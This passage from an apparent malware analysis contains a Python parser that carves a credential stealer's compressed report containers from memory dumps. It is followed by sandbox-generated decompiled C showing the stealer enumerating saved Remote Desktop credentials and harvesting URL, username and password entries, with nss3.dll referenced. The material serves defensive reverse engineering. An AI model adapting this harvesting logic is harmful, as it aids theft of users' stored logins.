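            if b >> 1 == 0:
                return bytes(out)
            copy(b >> 1, 2 + (b & 1)); r0, lwm = b >> 1, 1
        else:                                        # 111: one byte from a 4-bit offset (0 = literal zero)
            off = sum(getbit() << (3 - i) for i in range(4))
            out.append(out[-off] if off else 0); lwm = 0

def pack_report(payload: bytes) -> bytes:            # mirrors the decompiled writes: magic, DWORD length, payload
    return MAGIC + len(payload).to_bytes(4, "little") + ap_pack(payload)

def parse_report(blob: bytes) -> bytes:              # unwrap one container, checking the stored length
    if blob[:8] != MAGIC:
        raise ValueError("missing PKDFILE0 magic")
    data = ap_depack(blob[12:])
    if len(data) != int.from_bytes(blob[8:12], "little"):
        raise ValueError("length field does not match the depacked size")
    return data

def find_reports(dump: bytes) -> list:               # carve every parseable container out of e.g. a memory dump
    found, start = [], 0
    while (i := dump.find(MAGIC, start)) >= 0:
        try:
            found.append(parse_report(dump[i:]))
        except (ValueError, IndexError):             # truncated or not really a container: keep scanning
            pass
        start = i + 1
    return found

# Constructed sample report body (not real stolen data); the repeated fields are what aPLib exploits.
SAMPLE = (b"ftp://ftp.example.net\x00alice\x00hunter2\x00http://mail.example.net\x00alice\x00hunter2\x00"
          b"https://www.example.net\x00bob\x00hunter2\x00")
```

parse_report raises on a bad magic, a length field that disagrees with the depacked size, or a stream that runs off the end of the buffer; find_reports swallows those so one false hit on the 8-byte magic does not stop a scan of a dump. Checking the stored length against the depacked size is the cheap sanity test to apply before trusting anything carved this way.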

                                                                    C-Code - Quality: 100%
                                                                    			E00408568(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
                                                                    				char* _v8;
                                                                    				char* _v12;
                                                                    				char* _v16;
                                                                    				char* _v20;
                                                                    				char* _v24;
                                                                    				void* _t47;
                                                                    				char* _t49;
                                                                    				char** _t50;
                                                                    				void* _t57;
                                                                    				char* _t70;
                                                                    				char* _t73;
                                                                    				char* _t74;
                                                                    				char* _t75;
                                                                    				char* _t76;
                                                                    				void* _t77;
                                                                    
                                                                    				_t77 = __eflags;
                                                                    				_t72 = __ecx;
                                                                    				_t71 = __ebx;
                                                                    				E004013E8(_t47, __ebx, __ecx, _a4, 1, _a16);
                                                                    				_t49 = E00401364(_t77, _a4, _a16);
                                                                    				_t75 = _t49;
                                                                    				while(1) {
                                                                    					_t76 = _t75;
                                                                    					if(_t76 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t50 = _a16;
                                                                    					__eflags =  *_t50;
                                                                    					if( *_t50 == 0) {
                                                                    						return _t50;
                                                                    					}
                                                                    					_v8 = 0;
                                                                    					_t73 = E004084A7(_t71, _t72, _a4, _a12, _a16,  &_v8);
                                                                    					__eflags = _v8;
                                                                    					if(_v8 == 0) {
                                                                    						_v24 = 0;
                                                                    					} else {
                                                                    						_t70 = StrStrIA(_v8, "http://");
                                                                    						__eflags = _t70;
                                                                    						if(_t70 == 0) {
                                                                    							_t70 = StrStrIA(_v8, "https://");
                                                                    						}
                                                                    						_v24 = _t70;
                                                                    					}
                                                                    					__eflags = _v24;
                                                                    					if(_v24 != 0) {
                                                                    						E004015CB(E00401569(_a8, 0xbeef0001), _a8, _v8);
                                                                    					}
                                                                    					while(1) {
                                                                    						_t74 = _t73;
                                                                    						__eflags = _t74;
                                                                    						if(_t74 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags =  *_a16;
                                                                    						if( *_a16 != 0) {
                                                                    							_v12 = 0;
                                                                    							_v16 = 0;
                                                                    							_v20 = 0;
                                                                    							_t57 = E00408524(_t71, _a4, _a16,  &_v12,  &_v16,  &_v20);
                                                                    							__eflags = _v24;
                                                                    							if(_v24 != 0) {
                                                                    								__eflags = _v12;
                                                                    								if(_v12 != 0) {
                                                                    									__eflags = _v16;
                                                                    									if(_v16 != 0) {
                                                                    										L17:
                                                                    										E004015CB(E004015CB(E004015CB(_t57, _a8, _v12), _a8, _v16), _a8, _v20);
                                                                    									} else {
                                                                    										__eflags = _v20;
                                                                    										if(_v20 != 0) {
                                                                    											goto L17;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							E004018B8(_v12);
                                                                    							E004018B8(_v16);
                                                                    							E004018B8(_v20);
                                                                    							_t73 = _t74 - 1;
                                                                    							__eflags = _t73;
                                                                    							continue;
                                                                    						} else {
                                                                    						}
                                                                    						break;
                                                                    					}
                                                                    					__eflags = _v24;
                                                                    					if(_v24 != 0) {
                                                                    						E00401569(_a8, 0);
                                                                    						E00401569(_a8, 0);
                                                                    						E00401569(_a8, 0);
                                                                    					}
                                                                    					_t49 = E004018B8(_v8);
                                                                    					_t75 = _t76 - 1;
                                                                    					__eflags = _t75;
                                                                    				}
                                                                    				return _t49;
                                                                    			}
                                                                    Address column for the decompiled function above (one instruction address per line of the side-by-side view): 0x00408568, 0x00408568, 0x00408568, 0x00408578, 0x00408583, 0x00408588, 0x004086ca, 0x004086ca, 0x004086cc, 0x00000000, 0x00000000, 0x0040858f, 0x00408592, 0x00408595, 0x00000000, 0x00000000, 0x0040859c, 0x004085b5, 0x004085b7, 0x004085bb, 0x004085e0, 0x004085bd, 0x004085ca, 0x004085ca, 0x004085cc, 0x004085d6, 0x004085d6, 0x004085db, 0x004085db, 0x004085e7, 0x004085eb, 0x00408600, 0x00408600, 0x00408695, 0x00408695, 0x00408695, 0x00408697, 0x00000000, 0x00000000, 0x0040860d, 0x00408610, 0x00408617, 0x0040861e, 0x00408625, 0x0040863e, 0x00408643, 0x00408647, 0x00408649, 0x0040864d, 0x0040864f, 0x00408653, 0x0040865b, 0x00408677, 0x00408655, 0x00408655, 0x00408659, 0x00000000, 0x00000000, 0x00408659, 0x00408653, 0x0040864d, 0x0040867f, 0x00408687, 0x0040868f, 0x00408694, 0x00408694, 0x00000000, 0x00000000, 0x00408612, 0x00000000, 0x00408610, 0x0040869d, 0x004086a1, 0x004086a8, 0x004086b2, 0x004086bc, 0x004086bc, 0x004086c4, 0x004086c9, 0x004086c9, 0x004086c9, 0x004086d5

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: http://$https://
                                                                    • API String ID: 0-1916535328
                                                                    • Opcode ID: 3d177ae434288baa113bf2edf4519cd5214faf81bde89a66f72c30d4eebda108
                                                                    • Instruction ID: 36914738dcc24f5284e4ebbc1b9eef358293ae7963248e41ec2cf401613fd4ce
                                                                    • Opcode Fuzzy Hash: 3d177ae434288baa113bf2edf4519cd5214faf81bde89a66f72c30d4eebda108
                                                                    • Instruction Fuzzy Hash: 6C411931800109FADF12AF91CE05BDE7BB6AF40358F10853AB551791F1CB7A4B90EB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E00401AEC(void* __ecx, void* __edi, intOrPtr _a4) {
                                                                    				void* _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v278;
                                                                    				signed int _v284;
                                                                    				signed int _t27;
                                                                    				void** _t29;
                                                                    				intOrPtr _t32;
                                                                    				void* _t40;
                                                                    				signed int _t43;
                                                                    				signed int _t45;
                                                                    				void* _t47;
                                                                    				signed int _t51;
                                                                    
                                                                    				_t47 = __ecx;
                                                                    				_t27 = GetTickCount();
                                                                    				asm("rol eax, 0xb");
                                                                    				_v284 =  !_t27;
                                                                    				_t45 = 0;
                                                                    				_t29 =  &_v8;
                                                                    				_push(_t29);
                                                                    				_push(_a4);
                                                                    				L00410790();
                                                                    				_t49 = _t29;
                                                                    				if(_t29 >= 0) {
                                                                    					_t32 = E00401082(_t29, __edi, _t49, _a4);
                                                                    					_v16 = _t32;
                                                                    					GlobalFix(_v8);
                                                                    					_t29 = _t32;
                                                                    					_t50 = _t29;
                                                                    					if(_t29 != 0) {
                                                                    						_v20 = _t29;
                                                                    						_v12 = E004018CF(_v16);
                                                                    						E00401906(_v20, _v12, _v16);
                                                                    						GlobalUnWire(_v8);
                                                                    						E0040193F(_t47, _t50,  &_v278,  &_v284, 4);
                                                                    						_t40 = E004019AA( &_v278, _v12, _v16);
                                                                    						_push(_a4);
                                                                    						E0040131F(_t40, _t50);
                                                                    						_t43 = E0040157E(_a4,  &_v284, 4);
                                                                    						_t45 = _t43 & E0040157E(_a4, _v12, _v16);
                                                                    						_t51 = _t45;
                                                                    						_t29 = E004018B8(_v12);
                                                                    					}
                                                                    				}
                                                                    				_push(_a4);
                                                                    				E0040129A(_t29, _t51);
                                                                    				return _t45;
                                                                    			}
                                                                    Address column for the decompiled function above (one instruction address per line of the side-by-side view): 0x00401aec, 0x00401af6, 0x00401afb, 0x00401b00, 0x00401b06, 0x00401b08, 0x00401b0b, 0x00401b0c, 0x00401b0f, 0x00401b14, 0x00401b16, 0x00401b1f, 0x00401b24, 0x00401b2a, 0x00401b2f, 0x00401b2f, 0x00401b31, 0x00401b33, 0x00401b3e, 0x00401b4a, 0x00401b52, 0x00401b67, 0x00401b79, 0x00401b7e, 0x00401b81, 0x00401b92, 0x00401ba7, 0x00401ba7, 0x00401bac, 0x00401bac, 0x00401b31, 0x00401bb1, 0x00401bb4, 0x00401bbd

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00401AF6
                                                                    • 73D83240.OLE32(?,?), ref: 00401B0F
                                                                    • GlobalFix.KERNEL32 ref: 00401B2A
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • GlobalUnWire.KERNEL32 ref: 00401B52
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: GlobalLocal$AllocCountD83240FreeTickWire
                                                                    • String ID:
                                                                    • API String ID: 462972100-0
                                                                    • Opcode ID: b9874f5c6deaf341b335be248c940a421b75c7ff6a78c87e761cedec48a48445
                                                                    • Instruction ID: 621e9e9be75d07b42097c487be39cb2d33a31aa4828135fb6f0f97c2ff2c831f
                                                                    • Opcode Fuzzy Hash: b9874f5c6deaf341b335be248c940a421b75c7ff6a78c87e761cedec48a48445
                                                                    • Instruction Fuzzy Hash: 21219875D0010CBEDF01AFA1DC429DDBB7AAF04344F0040B6BA15B51B1DB799BA5AB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E0040CC29(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char* _t29;
                                                                    				char* _t31;
                                                                    
                                                                    				E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _a8), _a4, _a12);
                                                                    				E0040159F(_a4, _a16, _a20);
                                                                    				_t29 = StrStrIA(_a12, 0x41679f);
                                                                    				if(_t29 == 0) {
                                                                    					_push("TERMSRV/");
                                                                    					L0041066A();
                                                                    					_v12 = _t29;
                                                                    					_t31 = StrStrIA(_a12, "TERMSRV/");
                                                                    					if(_t31 != 0) {
                                                                    						_a12 = _t31;
                                                                    					}
                                                                    					_t29 = E004037C6(_t31, _a12);
                                                                    					if(_t29 != 0xffffffff) {
                                                                    						_v8 = _t29;
                                                                    						E004015CB(E00401569(_a4, 0xbeef0001), _a4, _a8);
                                                                    						E00401569(_a4, _v8);
                                                                    						return E0040159F(_a4, _a16, _a20);
                                                                    					}
                                                                    				}
                                                                    				return _t29;
                                                                    			}
                                                                    Address column for the decompiled function above (one instruction address per line of the side-by-side view): 0x0040cc4d, 0x0040cc5b, 0x0040cc6d, 0x0040cc6f, 0x0040cc71, 0x0040cc76, 0x0040cc7b, 0x0040cc8b, 0x0040cc8d, 0x0040cc92, 0x0040cc92, 0x0040cc98, 0x0040cca0, 0x0040cca2, 0x0040ccb8, 0x0040ccc3, 0x00000000, 0x0040ccd1, 0x0040cca0, 0x0040ccd7

                                                                    APIs
                                                                      • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                                    • StrStrIA.SHLWAPI(?,0041679F), ref: 0040CC68
                                                                    • lstrlen.KERNEL32(TERMSRV/,?,0041679F), ref: 0040CC76
                                                                    • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041679F), ref: 0040CC86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: TERMSRV/
                                                                    • API String ID: 1659193697-3001602198
                                                                    • Opcode ID: cbae450a8c29367f078cf42c0da4fa7866791775ea3b89897ef4164960869c3e
                                                                    • Instruction ID: 0e33322fa43a7393c9c901e98c28ddf77560ff6a40d7ebd916c261fa5b4e0482
                                                                    • Opcode Fuzzy Hash: cbae450a8c29367f078cf42c0da4fa7866791775ea3b89897ef4164960869c3e
                                                                    • Instruction Fuzzy Hash: B011A835410109FFDF026F61CD428DD3E62AF44398F104536B929791F1DB7A8AB1AB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?), ref: 00409074
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409095
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectorylstrlen
                                                                    • String ID: nss3.dll
                                                                    • API String ID: 2713697268-2492180550
                                                                    • Opcode ID: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
                                                                    • Instruction ID: 79ef5b793eaa19e43d16629d1b832ed7db9b7e222fb3f2d26c77b95c4dd7ac76
                                                                    • Opcode Fuzzy Hash: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
                                                                    • Instruction Fuzzy Hash: E811A170602101EFDB106F68EE8E7C93FB1BB84385F01C436E111A92E2E7B9CC918A4D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 16%
                                                                    			E0040CCDA(intOrPtr _a4) {
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				void* _t17;
                                                                    				intOrPtr* _t23;
                                                                    				void* _t25;
                                                                    
                                                                    				if( *0x414b0f != 0 &&  *0x414b0b != 0 &&  *0x414b43 != 0) {
                                                                    					_v8 = 0;
                                                                    					_v12 = 0;
                                                                    					_t17 =  *0x414b0b("TERMSRV/*", 0,  &_v12,  &_v8);
                                                                    					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
                                                                    						_t23 = _v8;
                                                                    						while(_v12 != 0 &&  *_t23 != 0) {
                                                                    							E0040CC29(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
                                                                    							_t25 = _t23;
                                                                    							_v12 = _v12 - 1;
                                                                    							_t23 = _t25 + 4;
                                                                    							__eflags = _t23;
                                                                    						}
                                                                    						return  *0x414b0f(_v8);
                                                                    					}
                                                                    				}
                                                                    				return _t17;
                                                                    			}

                                                                    APIs
                                                                    • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
                                                                    • CredFree.ADVAPI32(00000000), ref: 0040CD60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Cred$EnumerateFree
                                                                    • String ID: TERMSRV/*
                                                                    • API String ID: 3403564193-275249402
                                                                    • Opcode ID: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                                                    • Instruction ID: 46919d1b78b4c4f98928751ff711c86717132dd267c8420e9221b8d9fce6a23c
                                                                    • Opcode Fuzzy Hash: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                                                    • Instruction Fuzzy Hash: 91112731804204EBDF319F94C9887DABBB4AF05705F14827BA501721E0C379AF85DB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%